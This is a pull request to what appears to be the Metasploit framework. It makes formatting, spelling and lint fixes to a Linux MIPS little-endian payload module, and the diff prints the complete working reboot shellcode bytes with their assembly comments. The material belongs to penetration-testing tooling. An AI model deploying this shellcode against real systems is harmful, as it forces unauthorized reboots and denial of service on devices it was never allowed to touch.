### PR TITLE
msftidy fixes to m-1-k-3's mipsle reboot shellcode

### DIFF
--- a/modules/payloads/singles/linux/mipsle/reboot.rb
+++ b/modules/payloads/singles/linux/mipsle/reboot.rb
@@ -12,10 +12,10 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Linux reboot payload',
+      'Name'          => 'Linux Reboot',
       'Description'   => %q{
-                A very small shellcode for rebooting the system. 
-                This payload is sometimes helpfull for testing purposes.
+            A very small shellcode for rebooting the system.
+            This payload is sometimes helpful for testing purposes.
          },
       'Author'        =>
         [
@@ -35,16 +35,15 @@ module Metasploit3
   end
 
   def generate
-
     shellcode =
-	"\x21\x43\x06\x3c" +  #lui     a2,0x4321
-        "\xdc\xfe\xc6\x34" +  #ori     a2,a2,0xfedc
-        "\x12\x28\x05\x3c" +  #lui     a1,0x2812
-        "\x69\x19\xa5\x34" +  #ori     a1,a1,0x1969
-        "\xe1\xfe\x04\x3c" +  #lui     a0,0xfee1
-        "\xad\xde\x84\x34" +  #ori     a0,a0,0xdead
-        "\xf8\x0f\x02\x24" +  #li      v0,4088
-        "\x0c\x01\x01\x01"    #syscall 0x40404
+      "\x21\x43\x06\x3c" +  # lui     a2,0x4321
+      "\xdc\xfe\xc6\x34" +  # ori     a2,a2,0xfedc
+      "\x12\x28\x05\x3c" +  # lui     a1,0x2812
+      "\x69\x19\xa5\x34" +  # ori     a1,a1,0x1969
+      "\xe1\xfe\x04\x3c" +  # lui     a0,0xfee1
+      "\xad\xde\x84\x34" +  # ori     a0,a0,0xdead
+      "\xf8\x0f\x02\x24" +  # li      v0,4088
+      "\x0c\x01\x01\x01"    # syscall 0x40404
 
     return super + shellcode
   end


### PR DESCRIPTION
Oops, I did the review a bit fast and missed a couple msftidy problems. This PR fixes them and does some spacing/spelling corrections.
